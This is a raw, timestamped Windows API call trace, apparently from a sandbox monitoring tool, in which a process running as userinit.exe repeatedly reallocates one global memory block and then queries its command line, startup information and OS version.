[0086.838] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.838] GlobalUnlock (hMem=0xca000c) returned 0
[0086.838] GlobalReAlloc (hMem=0xca000c, dwBytes=0x4e000, uFlags=0x2) returned 0xca000c
[0086.838] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.839] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.839] GlobalUnlock (hMem=0xca000c) returned 0
[0086.839] GlobalReAlloc (hMem=0xca000c, dwBytes=0x50000, uFlags=0x2) returned 0xca000c
[0086.839] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.886] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.886] GlobalUnlock (hMem=0xca000c) returned 0
[0086.886] GlobalReAlloc (hMem=0xca000c, dwBytes=0x52000, uFlags=0x2) returned 0xca000c
[0086.886] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.886] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.886] GlobalUnlock (hMem=0xca000c) returned 0
[0086.886] GlobalReAlloc (hMem=0xca000c, dwBytes=0x54000, uFlags=0x2) returned 0xca000c
[0086.886] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.887] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.887] GlobalUnlock (hMem=0xca000c) returned 0
[0086.887] GlobalReAlloc (hMem=0xca000c, dwBytes=0x56000, uFlags=0x2) returned 0xca000c
[0086.887] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.888] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.888] GlobalUnlock (hMem=0xca000c) returned 0
[0086.888] GlobalReAlloc (hMem=0xca000c, dwBytes=0x58000, uFlags=0x2) returned 0xca000c
[0086.888] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.888] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.888] GlobalUnlock (hMem=0xca000c) returned 0
[0086.888] GlobalReAlloc (hMem=0xca000c, dwBytes=0x5a000, uFlags=0x2) returned 0xca000c
[0086.888] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.889] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.889] GlobalUnlock (hMem=0xca000c) returned 0
[0086.889] GlobalReAlloc (hMem=0xca000c, dwBytes=0x5c000, uFlags=0x2) returned 0xca000c
[0086.889] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.889] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.889] GlobalUnlock (hMem=0xca000c) returned 0
[0086.889] GlobalReAlloc (hMem=0xca000c, dwBytes=0x5e000, uFlags=0x2) returned 0xca000c
[0086.889] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.890] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.890] GlobalUnlock (hMem=0xca000c) returned 0
[0086.890] GlobalReAlloc (hMem=0xca000c, dwBytes=0x60000, uFlags=0x2) returned 0xca000c
[0086.890] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.891] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.891] GlobalUnlock (hMem=0xca000c) returned 0
[0086.891] GlobalReAlloc (hMem=0xca000c, dwBytes=0x62000, uFlags=0x2) returned 0xca000c
[0086.891] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.891] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.891] GlobalUnlock (hMem=0xca000c) returned 0
[0086.891] GlobalReAlloc (hMem=0xca000c, dwBytes=0x64000, uFlags=0x2) returned 0xca000c
[0086.891] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.892] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.892] GlobalUnlock (hMem=0xca000c) returned 0
[0086.892] GlobalReAlloc (hMem=0xca000c, dwBytes=0x66000, uFlags=0x2) returned 0xca000c
[0086.892] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.892] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.892] GlobalUnlock (hMem=0xca000c) returned 0
[0086.892] GlobalReAlloc (hMem=0xca000c, dwBytes=0x68000, uFlags=0x2) returned 0xca000c
[0086.892] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.893] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.893] GlobalUnlock (hMem=0xca000c) returned 0
[0086.893] GlobalReAlloc (hMem=0xca000c, dwBytes=0x6a000, uFlags=0x2) returned 0xca000c
[0086.893] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.894] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.894] GlobalUnlock (hMem=0xca000c) returned 0
[0086.894] GlobalReAlloc (hMem=0xca000c, dwBytes=0x6c000, uFlags=0x2) returned 0xca000c
[0086.900] GlobalLock (hMem=0xca000c) returned 0x260820
[0086.901] GlobalHandle (pMem=0x260820) returned 0xca000c
[0086.901] GlobalUnlock (hMem=0xca000c) returned 0
[0086.901] GlobalReAlloc (hMem=0xca000c, dwBytes=0x6e000, uFlags=0x2) returned 0xca000c
[0086.901] GlobalLock (hMem=0xca000c) returned 0x260820
[0086.902] GlobalHandle (pMem=0x260820) returned 0xca000c
[0086.902] GlobalUnlock (hMem=0xca000c) returned 0
[0086.902] GlobalReAlloc (hMem=0xca000c, dwBytes=0x70000, uFlags=0x2) returned 0xca000c
[0086.918] GlobalLock (hMem=0xca000c) returned 0x2430048
[0086.919] GlobalHandle (pMem=0x2430048) returned 0xca000c
[0086.919] GlobalUnlock (hMem=0xca000c) returned 0
[0086.919] GlobalReAlloc (hMem=0xca000c, dwBytes=0x72000, uFlags=0x2) returned 0xca000c
[0086.926] GlobalLock (hMem=0xca000c) returned 0x24a0058
[0086.927] GlobalHandle (pMem=0x24a0058) returned 0xca000c
[0086.927] GlobalUnlock (hMem=0xca000c) returned 0
[0086.927] GlobalReAlloc (hMem=0xca000c, dwBytes=0x74000, uFlags=0x2) returned 0xca000c
[0086.927] GlobalLock (hMem=0xca000c) returned 0x24a0058
[0086.928] GlobalHandle (pMem=0x24a0058) returned 0xca000c
[0086.928] GlobalUnlock (hMem=0xca000c) returned 0
[0086.928] GlobalReAlloc (hMem=0xca000c, dwBytes=0x76000, uFlags=0x2) returned 0xca000c
[0086.991] GlobalLock (hMem=0xca000c) returned 0x1f6810
[0086.991] GlobalHandle (pMem=0x1f6810) returned 0xca000c
[0086.991] GlobalUnlock (hMem=0xca000c) returned 0
[0086.991] GlobalReAlloc (hMem=0xca000c, dwBytes=0x78000, uFlags=0x2) returned 0xca000c
[0086.998] GlobalLock (hMem=0xca000c) returned 0x2430048
[0086.999] GlobalHandle (pMem=0x2430048) returned 0xca000c
[0086.999] GlobalUnlock (hMem=0xca000c) returned 0
[0086.999] GlobalReAlloc (hMem=0xca000c, dwBytes=0x7a000, uFlags=0x2) returned 0xca000c
[0087.007] GlobalLock (hMem=0xca000c) returned 0x24a8058
[0087.007] GlobalHandle (pMem=0x24a8058) returned 0xca000c
[0087.007] GlobalUnlock (hMem=0xca000c) returned 0
[0087.007] GlobalReAlloc (hMem=0xca000c, dwBytes=0x7c000, uFlags=0x2) returned 0xca000c
[0087.007] GlobalLock (hMem=0xca000c) returned 0x24a8058
[0087.008] GlobalHandle (pMem=0x24a8058) returned 0xca000c
[0087.008] GlobalUnlock (hMem=0xca000c) returned 0
[0087.008] GlobalReAlloc (hMem=0xca000c, dwBytes=0x7e000, uFlags=0x2) returned 0xca000c
[0087.023] GlobalLock (hMem=0xca000c) returned 0x2530048
[0087.024] GlobalHandle (pMem=0x2530048) returned 0xca000c
[0087.024] GlobalUnlock (hMem=0xca000c) returned 0
[0087.024] GlobalReAlloc (hMem=0xca000c, dwBytes=0x80000, uFlags=0x2) returned 0xca000c
[0087.089] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.090] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.090] GlobalUnlock (hMem=0xca000c) returned 0
[0087.090] GlobalReAlloc (hMem=0xca000c, dwBytes=0x82000, uFlags=0x2) returned 0xca000c
[0087.101] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.102] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.102] GlobalUnlock (hMem=0xca000c) returned 0
[0087.102] GlobalReAlloc (hMem=0xca000c, dwBytes=0x84000, uFlags=0x2) returned 0xca000c
[0087.114] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.115] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.115] GlobalUnlock (hMem=0xca000c) returned 0
[0087.115] GlobalReAlloc (hMem=0xca000c, dwBytes=0x86000, uFlags=0x2) returned 0xca000c
[0087.175] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.176] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.176] GlobalUnlock (hMem=0xca000c) returned 0
[0087.176] GlobalReAlloc (hMem=0xca000c, dwBytes=0x88000, uFlags=0x2) returned 0xca000c
[0087.190] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.191] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.191] GlobalUnlock (hMem=0xca000c) returned 0
[0087.191] GlobalReAlloc (hMem=0xca000c, dwBytes=0x8a000, uFlags=0x2) returned 0xca000c
[0087.206] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.207] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.207] GlobalUnlock (hMem=0xca000c) returned 0
[0087.207] GlobalReAlloc (hMem=0xca000c, dwBytes=0x8c000, uFlags=0x2) returned 0xca000c
[0087.269] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.270] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.270] GlobalUnlock (hMem=0xca000c) returned 0
[0087.270] GlobalReAlloc (hMem=0xca000c, dwBytes=0x8e000, uFlags=0x2) returned 0xca000c
[0087.284] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.285] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.285] GlobalUnlock (hMem=0xca000c) returned 0
[0087.285] GlobalReAlloc (hMem=0xca000c, dwBytes=0x90000, uFlags=0x2) returned 0xca000c
[0087.302] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.303] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.303] GlobalUnlock (hMem=0xca000c) returned 0
[0087.304] GlobalReAlloc (hMem=0xca000c, dwBytes=0x92000, uFlags=0x2) returned 0xca000c
[0087.365] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.366] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.366] GlobalUnlock (hMem=0xca000c) returned 0
[0087.366] GlobalReAlloc (hMem=0xca000c, dwBytes=0x94000, uFlags=0x2) returned 0xca000c
[0087.382] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.383] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.383] GlobalUnlock (hMem=0xca000c) returned 0
[0087.383] GlobalReAlloc (hMem=0xca000c, dwBytes=0x96000, uFlags=0x2) returned 0xca000c
[0087.398] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.399] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.399] GlobalUnlock (hMem=0xca000c) returned 0
[0087.399] GlobalReAlloc (hMem=0xca000c, dwBytes=0x98000, uFlags=0x2) returned 0xca000c
[0087.462] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.463] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.463] GlobalUnlock (hMem=0xca000c) returned 0
[0087.463] GlobalReAlloc (hMem=0xca000c, dwBytes=0x9a000, uFlags=0x2) returned 0xca000c
[0087.479] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.480] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.480] GlobalUnlock (hMem=0xca000c) returned 0
[0087.480] GlobalReAlloc (hMem=0xca000c, dwBytes=0x9c000, uFlags=0x2) returned 0xca000c
[0087.545] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.546] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.546] GlobalUnlock (hMem=0xca000c) returned 0
[0087.546] GlobalReAlloc (hMem=0xca000c, dwBytes=0x9e000, uFlags=0x2) returned 0xca000c
[0087.565] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.566] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.566] GlobalUnlock (hMem=0xca000c) returned 0
[0087.566] GlobalReAlloc (hMem=0xca000c, dwBytes=0xa0000, uFlags=0x2) returned 0xca000c
[0087.584] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.636] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.636] GlobalUnlock (hMem=0xca000c) returned 0
[0087.636] GlobalReAlloc (hMem=0xca000c, dwBytes=0xa2000, uFlags=0x2) returned 0xca000c
[0087.653] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.654] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.654] GlobalUnlock (hMem=0xca000c) returned 0
[0087.654] GlobalReAlloc (hMem=0xca000c, dwBytes=0xa4000, uFlags=0x2) returned 0xca000c
[0087.672] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.673] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.673] GlobalUnlock (hMem=0xca000c) returned 0
[0087.673] GlobalReAlloc (hMem=0xca000c, dwBytes=0xa6000, uFlags=0x2) returned 0xca000c
[0087.742] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.743] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.743] GlobalUnlock (hMem=0xca000c) returned 0
[0087.760] GlobalReAlloc (hMem=0xca000c, dwBytes=0xa8000, uFlags=0x2) returned 0xca000c
[0087.778] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.779] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.779] GlobalUnlock (hMem=0xca000c) returned 0
[0087.779] GlobalReAlloc (hMem=0xca000c, dwBytes=0xaa000, uFlags=0x2) returned 0xca000c
[0087.844] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.845] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.845] GlobalUnlock (hMem=0xca000c) returned 0
[0087.845] GlobalReAlloc (hMem=0xca000c, dwBytes=0xac000, uFlags=0x2) returned 0xca000c
[0087.863] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.864] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.864] GlobalUnlock (hMem=0xca000c) returned 0
[0087.864] GlobalReAlloc (hMem=0xca000c, dwBytes=0xae000, uFlags=0x2) returned 0xca000c
[0087.881] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.882] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.882] GlobalUnlock (hMem=0xca000c) returned 0
[0087.882] GlobalReAlloc (hMem=0xca000c, dwBytes=0xb0000, uFlags=0x2) returned 0xca000c
[0087.945] GlobalLock (hMem=0xca000c) returned 0xe30020
[0087.946] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0087.946] GlobalUnlock (hMem=0xca000c) returned 0
[0087.946] GlobalReAlloc (hMem=0xca000c, dwBytes=0xb2000, uFlags=0x2) returned 0xca000c
[0087.964] GlobalLock (hMem=0xca000c) returned 0x2730020
[0087.965] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0087.965] GlobalUnlock (hMem=0xca000c) returned 0
[0087.965] GlobalReAlloc (hMem=0xca000c, dwBytes=0xb4000, uFlags=0x2) returned 0xca000c
[0088.032] GlobalLock (hMem=0xca000c) returned 0xe30020
[0088.033] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0088.033] GlobalUnlock (hMem=0xca000c) returned 0
[0088.033] GlobalReAlloc (hMem=0xca000c, dwBytes=0xb6000, uFlags=0x2) returned 0xca000c
[0088.051] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.052] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.052] GlobalUnlock (hMem=0xca000c) returned 0
[0088.052] GlobalReAlloc (hMem=0xca000c, dwBytes=0xb8000, uFlags=0x2) returned 0xca000c
[0088.104] GlobalLock (hMem=0xca000c) returned 0xe30020
[0088.105] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0088.105] GlobalUnlock (hMem=0xca000c) returned 0
[0088.105] GlobalReAlloc (hMem=0xca000c, dwBytes=0xba000, uFlags=0x2) returned 0xca000c
[0088.124] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.125] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.125] GlobalUnlock (hMem=0xca000c) returned 0
[0088.125] GlobalReAlloc (hMem=0xca000c, dwBytes=0xbc000, uFlags=0x2) returned 0xca000c
[0088.144] GlobalLock (hMem=0xca000c) returned 0xe30020
[0088.145] GlobalHandle (pMem=0xe30020) returned 0xca000c
[0088.145] GlobalUnlock (hMem=0xca000c) returned 0
[0088.145] GlobalReAlloc (hMem=0xca000c, dwBytes=0xbe000, uFlags=0x2) returned 0xca000c
[0088.209] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.210] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.210] GlobalUnlock (hMem=0xca000c) returned 0
[0088.210] GlobalReAlloc (hMem=0xca000c, dwBytes=0xc0000, uFlags=0x2) returned 0xca000c
[0088.228] GlobalLock (hMem=0xca000c) returned 0x27f0020
[0088.229] GlobalHandle (pMem=0x27f0020) returned 0xca000c
[0088.229] GlobalUnlock (hMem=0xca000c) returned 0
[0088.229] GlobalReAlloc (hMem=0xca000c, dwBytes=0xc2000, uFlags=0x2) returned 0xca000c
[0088.294] GlobalLock (hMem=0xca000c) returned 0x28c0020
[0088.295] GlobalHandle (pMem=0x28c0020) returned 0xca000c
[0088.295] GlobalUnlock (hMem=0xca000c) returned 0
[0088.295] GlobalReAlloc (hMem=0xca000c, dwBytes=0xc4000, uFlags=0x2) returned 0xca000c
[0088.314] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.315] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.315] GlobalUnlock (hMem=0xca000c) returned 0
[0088.315] GlobalReAlloc (hMem=0xca000c, dwBytes=0xc6000, uFlags=0x2) returned 0xca000c
[0088.333] GlobalLock (hMem=0xca000c) returned 0x2800020
[0088.334] GlobalHandle (pMem=0x2800020) returned 0xca000c
[0088.334] GlobalUnlock (hMem=0xca000c) returned 0
[0088.334] GlobalReAlloc (hMem=0xca000c, dwBytes=0xc8000, uFlags=0x2) returned 0xca000c
[0088.400] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.401] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.401] GlobalUnlock (hMem=0xca000c) returned 0
[0088.401] GlobalReAlloc (hMem=0xca000c, dwBytes=0xca000, uFlags=0x2) returned 0xca000c
[0088.420] GlobalLock (hMem=0xca000c) returned 0x2800020
[0088.421] GlobalHandle (pMem=0x2800020) returned 0xca000c
[0088.421] GlobalUnlock (hMem=0xca000c) returned 0
[0088.421] GlobalReAlloc (hMem=0xca000c, dwBytes=0xcc000, uFlags=0x2) returned 0xca000c
[0088.473] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.474] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.474] GlobalUnlock (hMem=0xca000c) returned 0
[0088.474] GlobalReAlloc (hMem=0xca000c, dwBytes=0xce000, uFlags=0x2) returned 0xca000c
[0088.493] GlobalLock (hMem=0xca000c) returned 0x2800020
[0088.494] GlobalHandle (pMem=0x2800020) returned 0xca000c
[0088.494] GlobalUnlock (hMem=0xca000c) returned 0
[0088.494] GlobalReAlloc (hMem=0xca000c, dwBytes=0xd0000, uFlags=0x2) returned 0xca000c
[0088.562] GlobalLock (hMem=0xca000c) returned 0x28d0020
[0088.563] GlobalHandle (pMem=0x28d0020) returned 0xca000c
[0088.563] GlobalUnlock (hMem=0xca000c) returned 0
[0088.563] GlobalReAlloc (hMem=0xca000c, dwBytes=0xd2000, uFlags=0x2) returned 0xca000c
[0088.584] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.585] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.585] GlobalUnlock (hMem=0xca000c) returned 0
[0088.585] GlobalReAlloc (hMem=0xca000c, dwBytes=0xd4000, uFlags=0x2) returned 0xca000c
[0088.668] GlobalLock (hMem=0xca000c) returned 0x2810020
[0088.669] GlobalHandle (pMem=0x2810020) returned 0xca000c
[0088.669] GlobalUnlock (hMem=0xca000c) returned 0
[0088.669] GlobalReAlloc (hMem=0xca000c, dwBytes=0xd6000, uFlags=0x2) returned 0xca000c
[0088.688] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.688] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.688] GlobalUnlock (hMem=0xca000c) returned 0
[0088.688] GlobalReAlloc (hMem=0xca000c, dwBytes=0xd8000, uFlags=0x2) returned 0xca000c
[0088.709] GlobalLock (hMem=0xca000c) returned 0x2810020
[0088.766] GlobalHandle (pMem=0x2810020) returned 0xca000c
[0088.766] GlobalUnlock (hMem=0xca000c) returned 0
[0088.766] GlobalReAlloc (hMem=0xca000c, dwBytes=0xda000, uFlags=0x2) returned 0xca000c
[0088.787] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.789] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.789] GlobalUnlock (hMem=0xca000c) returned 0
[0088.789] GlobalReAlloc (hMem=0xca000c, dwBytes=0xdc000, uFlags=0x2) returned 0xca000c
[0088.857] GlobalLock (hMem=0xca000c) returned 0x2810020
[0088.858] GlobalHandle (pMem=0x2810020) returned 0xca000c
[0088.858] GlobalUnlock (hMem=0xca000c) returned 0
[0088.858] GlobalReAlloc (hMem=0xca000c, dwBytes=0xde000, uFlags=0x2) returned 0xca000c
[0088.879] GlobalLock (hMem=0xca000c) returned 0x2730020
[0088.880] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0088.880] GlobalUnlock (hMem=0xca000c) returned 0
[0088.880] GlobalReAlloc (hMem=0xca000c, dwBytes=0xe0000, uFlags=0x2) returned 0xca000c
[0088.948] GlobalLock (hMem=0xca000c) returned 0x2810020
[0088.949] GlobalHandle (pMem=0x2810020) returned 0xca000c
[0088.949] GlobalUnlock (hMem=0xca000c) returned 0
[0088.949] GlobalReAlloc (hMem=0xca000c, dwBytes=0xe2000, uFlags=0x2) returned 0xca000c
[0088.971] GlobalLock (hMem=0xca000c) returned 0x2900020
[0088.972] GlobalHandle (pMem=0x2900020) returned 0xca000c
[0088.972] GlobalUnlock (hMem=0xca000c) returned 0
[0088.972] GlobalReAlloc (hMem=0xca000c, dwBytes=0xe4000, uFlags=0x2) returned 0xca000c
[0089.043] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.044] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.044] GlobalUnlock (hMem=0xca000c) returned 0
[0089.044] GlobalReAlloc (hMem=0xca000c, dwBytes=0xe6000, uFlags=0x2) returned 0xca000c
[0089.067] GlobalLock (hMem=0xca000c) returned 0x2820020
[0089.068] GlobalHandle (pMem=0x2820020) returned 0xca000c
[0089.068] GlobalUnlock (hMem=0xca000c) returned 0
[0089.068] GlobalReAlloc (hMem=0xca000c, dwBytes=0xe8000, uFlags=0x2) returned 0xca000c
[0089.138] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.139] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.139] GlobalUnlock (hMem=0xca000c) returned 0
[0089.139] GlobalReAlloc (hMem=0xca000c, dwBytes=0xea000, uFlags=0x2) returned 0xca000c
[0089.163] GlobalLock (hMem=0xca000c) returned 0x2820020
[0089.164] GlobalHandle (pMem=0x2820020) returned 0xca000c
[0089.164] GlobalUnlock (hMem=0xca000c) returned 0
[0089.164] GlobalReAlloc (hMem=0xca000c, dwBytes=0xec000, uFlags=0x2) returned 0xca000c
[0089.234] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.235] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.235] GlobalUnlock (hMem=0xca000c) returned 0
[0089.235] GlobalReAlloc (hMem=0xca000c, dwBytes=0xee000, uFlags=0x2) returned 0xca000c
[0089.257] GlobalLock (hMem=0xca000c) returned 0x2820020
[0089.258] GlobalHandle (pMem=0x2820020) returned 0xca000c
[0089.258] GlobalUnlock (hMem=0xca000c) returned 0
[0089.258] GlobalReAlloc (hMem=0xca000c, dwBytes=0xf0000, uFlags=0x2) returned 0xca000c
[0089.329] GlobalLock (hMem=0xca000c) returned 0x2910020
[0089.330] GlobalHandle (pMem=0x2910020) returned 0xca000c
[0089.330] GlobalUnlock (hMem=0xca000c) returned 0
[0089.330] GlobalReAlloc (hMem=0xca000c, dwBytes=0xf2000, uFlags=0x2) returned 0xca000c
[0089.354] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.355] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.355] GlobalUnlock (hMem=0xca000c) returned 0
[0089.355] GlobalReAlloc (hMem=0xca000c, dwBytes=0xf4000, uFlags=0x2) returned 0xca000c
[0089.427] GlobalLock (hMem=0xca000c) returned 0x2830020
[0089.428] GlobalHandle (pMem=0x2830020) returned 0xca000c
[0089.428] GlobalUnlock (hMem=0xca000c) returned 0
[0089.428] GlobalReAlloc (hMem=0xca000c, dwBytes=0xf6000, uFlags=0x2) returned 0xca000c
[0089.453] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.454] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.454] GlobalUnlock (hMem=0xca000c) returned 0
[0089.454] GlobalReAlloc (hMem=0xca000c, dwBytes=0xf8000, uFlags=0x2) returned 0xca000c
[0089.527] GlobalLock (hMem=0xca000c) returned 0x2830020
[0089.528] GlobalHandle (pMem=0x2830020) returned 0xca000c
[0089.528] GlobalUnlock (hMem=0xca000c) returned 0
[0089.528] GlobalReAlloc (hMem=0xca000c, dwBytes=0xfa000, uFlags=0x2) returned 0xca000c
[0089.553] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.601] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.601] GlobalUnlock (hMem=0xca000c) returned 0
[0089.601] GlobalReAlloc (hMem=0xca000c, dwBytes=0xfc000, uFlags=0x2) returned 0xca000c
[0089.626] GlobalLock (hMem=0xca000c) returned 0x2830020
[0089.627] GlobalHandle (pMem=0x2830020) returned 0xca000c
[0089.627] GlobalUnlock (hMem=0xca000c) returned 0
[0089.627] GlobalReAlloc (hMem=0xca000c, dwBytes=0xfe000, uFlags=0x2) returned 0xca000c
[0089.695] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.695] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.695] GlobalUnlock (hMem=0xca000c) returned 0
[0089.696] GlobalReAlloc (hMem=0xca000c, dwBytes=0x100000, uFlags=0x2) returned 0xca000c
[0089.719] GlobalLock (hMem=0xca000c) returned 0x2830020
[0089.719] GlobalHandle (pMem=0x2830020) returned 0xca000c
[0089.719] GlobalUnlock (hMem=0xca000c) returned 0
[0089.720] GlobalReAlloc (hMem=0xca000c, dwBytes=0x102000, uFlags=0x2) returned 0xca000c
[0089.791] GlobalLock (hMem=0xca000c) returned 0x2940020
[0089.792] GlobalHandle (pMem=0x2940020) returned 0xca000c
[0089.792] GlobalUnlock (hMem=0xca000c) returned 0
[0089.792] GlobalReAlloc (hMem=0xca000c, dwBytes=0x104000, uFlags=0x2) returned 0xca000c
[0089.816] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.817] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.817] GlobalUnlock (hMem=0xca000c) returned 0
[0089.817] GlobalReAlloc (hMem=0xca000c, dwBytes=0x106000, uFlags=0x2) returned 0xca000c
[0089.887] GlobalLock (hMem=0xca000c) returned 0x2840020
[0089.888] GlobalHandle (pMem=0x2840020) returned 0xca000c
[0089.888] GlobalUnlock (hMem=0xca000c) returned 0
[0089.888] GlobalReAlloc (hMem=0xca000c, dwBytes=0x108000, uFlags=0x2) returned 0xca000c
[0089.960] GlobalLock (hMem=0xca000c) returned 0x2730020
[0089.961] GlobalHandle (pMem=0x2730020) returned 0xca000c
[0089.961] GlobalUnlock (hMem=0xca000c) returned 0
[0089.961] GlobalReAlloc (hMem=0xca000c, dwBytes=0x10a000, uFlags=0x2) returned 0xca000c
[0089.985] GlobalLock (hMem=0xca000c) returned 0x2840020
[0089.986] GlobalHandle (pMem=0x2840020) returned 0xca000c
[0089.986] GlobalUnlock (hMem=0xca000c) returned 0
[0089.986] GlobalReAlloc (hMem=0xca000c, dwBytes=0x10c000, uFlags=0x2) returned 0xca000c
[0090.056] GlobalLock (hMem=0xca000c) returned 0x2730020
[0090.057] VirtualAlloc (lpAddress=0x0, dwSize=0x110000, flAllocationType=0x2000, flProtect=0x1) returned 0x2840000
[0090.057] VirtualAlloc (lpAddress=0x2840000, dwSize=0x10c000, flAllocationType=0x1000, flProtect=0x4) returned 0x2840000
[0090.155] GetKeyboardType (nTypeFlag=0) returned 4
[0090.155] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0090.155] GetStartupInfoA (in: lpStartupInfo=0x12f3e0 | out: lpStartupInfo=0x12f3e0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0090.155] GetVersion () returned 0x1db10106
